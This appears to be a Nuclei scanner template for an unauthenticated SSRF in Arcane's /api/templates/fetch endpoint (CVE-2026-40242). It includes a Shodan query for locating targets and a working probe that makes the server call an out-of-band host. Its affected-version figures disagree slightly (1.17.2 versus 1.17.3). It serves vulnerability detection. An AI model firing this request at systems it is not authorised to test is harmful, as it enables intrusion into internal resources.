id: CVE-2026-40242 info: name: Arcane <= 1.17.2 - Server-Side Request Forgery author: 0x_Akoko severity: high description: | Arcane <= 1.17.3 contains an unauthenticated server-side request forgery caused by lack of URL scheme and host validation in /api/templates/fetch endpoint, letting remote attackers perform SSRF, exploit requires no authentication. impact: | Remote attackers can make the server perform arbitrary HTTP requests, potentially accessing internal resources or sensitive data. remediation: | Upgrade to version 1.17.3 or later. reference: - https://github.com/getarcaneapp/arcane/security/advisories/GHSA-ff24-4prj-gpmj - https://nvd.nist.gov/vuln/detail/CVE-2026-40242 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 cve-id: CVE-2026-40242 cwe-id: CWE-918 epss-score: 0.01262 epss-percentile: 0.79756 metadata: verified: true max-request: 1 vendor: getarcaneapp product: arcane shodan-query: http.html:"arcane" tags: cve,cve2026,arcane,ssrf,oast,unauth http: - raw: - | GET /api/templates/fetch?url=http://{{interactsh-url}}/test.json HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - status_code == 200 - contains(interactsh_protocol, "http") - contains(content_type, "application/json") condition: and # digest: 490a00463044022003d35b16a1421e83e6cb7a60321b238a6d30dc7aca666018774d8836fa2e643702204d6bff2fdb570ba5a78074f8f48a732d2fa6049af5c0cb0ec6a8e937275ded1e:922c64590222798bb761d5b6d8e72950